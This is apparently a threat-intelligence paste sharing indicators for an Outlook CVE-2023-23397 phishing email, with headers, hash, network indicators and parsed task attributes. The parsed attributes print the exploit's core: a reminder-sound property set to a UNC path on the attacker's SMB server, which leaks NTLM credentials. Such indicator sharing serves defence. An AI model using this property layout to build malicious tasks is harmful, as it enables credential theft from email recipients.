VRad

#outlook_eop_160323

Mar 16th, 2023 (edited)
2,116
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.15 KB | None | 0 0
  1. #IOC #OptiData #VR #MSOutlook #EoP #SMB #NTLM
  2.  
  3. https://pastebin.com/FJDa0MA8
  4.  
  5. FAQ:
  6. https://msrc.microsoft.com/blog/2023/03/microsoft-mitigates-outlook-elevation-of-privilege-vulnerability/
  7. https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23397
  8. https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2023-exchange-server-security-updates/ba-p/3764224
  9. https://microsoft.github.io/CSS-Exchange/Security/CVE-2023-23397/
  10.  
  11. attack_vector
  12. --------------
  13. email attach lrmng.txt > CVE-2023-23397 exploit > Outlook Task > \\85.195.206.7\lrmng\ > NTLM negotiation request > exfil of NTLM credentials
  14.  
  15. # # # # # # # #
  16. email_headers
  17. # # # # # # # #
  18. Return-Path: <[email protected]>
  19. Received: from semf03.mfg.siteprotect.com (semf03.mfg.siteprotect.com [64.26.60.166])
  20. Received: from smtpauth02.mfg.siteprotect.com ([64.26.60.151])
  21. Received: from [127.0.0.1] (unknown [85.195.206.7])
  22. Content-Type: application/ms-tnef; name=lrmng.txt
  23. Content-Transfer-Encoding: base64
  24. Content-Disposition: attachment; filename=lrmng.txt
  25. Subject: Alarm!
  26. Message-ID: <[email protected]>
  27. Date: Thu, 16 Mar 2023 09:50:29 +0000
  28.  
  29. # # # # # # # #
  30. files
  31. # # # # # # # #
  32.  
  33. SHA-256 562e40daf01ca6a8f397fed437abbd21bd33ffb8eedda2db3f2d6768b58b0444
  34. File name lrmng.txt [CVE-2023-23397 exploit]
  35. File size 6.94 KB (7108 bytes)
  36.  
  37. # # # # # # # #
  38. activity
  39. # # # # # # # #
  40.  
  41. PL_SCR email attach
  42.  
  43. C2 85.195.206.7:445
  44.  
  45. netwrk
  46. --------------
  47. 85.195.206.7 445 SMB Negotiate Protocol Request
  48.  
  49. comp
  50. --------------
  51. System 85-195-206-7.init7.net 445 ESTABLISHED
  52.  
  53. proc
  54. --------------
  55. C:\Program Files (x86)\Microsoft Office\Office*\OUTLOOK.EXE
  56.  
  57. persist
  58. --------------
  59. n/a
  60.  
  61. drop
  62. --------------
  63. n/a
  64.  
  65.  
  66. # # # # # # # #
  67. additional info
  68. # # # # # # # #
  69.  
  70. TNEF parsed
  71. --------------
  72. "attributes": {
  73. "Date Modified": "2022-06-07 07:56:42",
  74. "Date Received": "2023-02-07 09:54:49",
  75. "Date Sent": "2023-02-07 09:54:49",
  76. "From": [
  77. "EX",
  78. "/o=BLIND/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/[email protected]"
  79. ],
  80. "Message Class": "IPM.Task",
  81. "Message ID": "14DBDC85E2926A4291B27D5C13103DBE",
  82. "Message Status": 33,
  83. "Priority": 1,
  84. "Subject": "ALARM!"
  85. },
  86. "extended_attributes": {
  87. "0x8103": false,
  88. "0x8112": 2,
  89. "0x8113": 1,
  90. "0x811c": false,
  91. "0x8123": -1000,
  92. "0x8124": false,
  93. "0x8127": "",
  94. "0x812a": 0,
  95. "0x812c": false,
  96. "0x851e": true,
  97. "0x851f": "\\\\85.195.206.7\\lrmng",
  98. "0x8580": "[email protected]",
  99. "0x8581": "00000002\u0001/o=CERT/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/[email protected]",
  100. "0x85eb": 1033,
  101. "InTransitMessageCorrelator": "3\ufffd\ufffd\ufffd(u$K\ufffdus>\ufffdw(\ufffd",
  102. "MAPI_ACCESS": 7,
  103. "MAPI_ACCESS_LEVEL": 1,
  104. "MAPI_AGING_DONT_AGE_ME": false,
  105. "MAPI_ALTERNATE_RECIPIENT_ALLOWED": true,
  106. "MAPI_ANNIVERSARY_EVENT_ENTRY_ID": "",
  107. "MAPI_AUTO_LOG": 0,
  108. "MAPI_BIRTHDAY_EVENT_ENTRY_ID": "[email protected]",
  109. "MAPI_CHANGE_KEY": "\ufffd\u001e'M\u000e\ufffd\ufffdH\ufffd\ufffdK\ufffd1\ufffd-o\u0000\u0000\u0000\u0000\u001a\ufffd",
  110. "MAPI_CLIENT_SUBMIT_TIME": "2023-02-07 16:54:49.696000",
  111. "MAPI_CONTACT_USER_FIELD1": 0,
  112. "MAPI_CONVERSATION_INDEX": "\u0001\ufffd;\u0014\ufffdK>\ufffd\ufffd\ufffd\u0013x@\ufffd\ufffd\b\ufffd/\ufffd\ufffd\ufffd\ufffd",
  113. "MAPI_CONVERSATION_INDEX_TRACKING": true,
  114. "MAPI_CONVERSATION_TOPIC": "LGBTQ+",
  115. "MAPI_CREATION_TIME": "2023-02-07 16:53:29.210000",
  116. "MAPI_CURRENT_VERSION_NAME": "16.0",
  117. "MAPI_DELETE_AFTER_SUBMIT": false,
  118.  
  119.  
  120. # # # # # # # #
  121. VT & Intezer
  122. # # # # # # # #
  123. https://www.virustotal.com/gui/file/562e40daf01ca6a8f397fed437abbd21bd33ffb8eedda2db3f2d6768b58b0444/details
  124.  
  125.  
  126. VR
Add Comment
Please, Sign In to add comment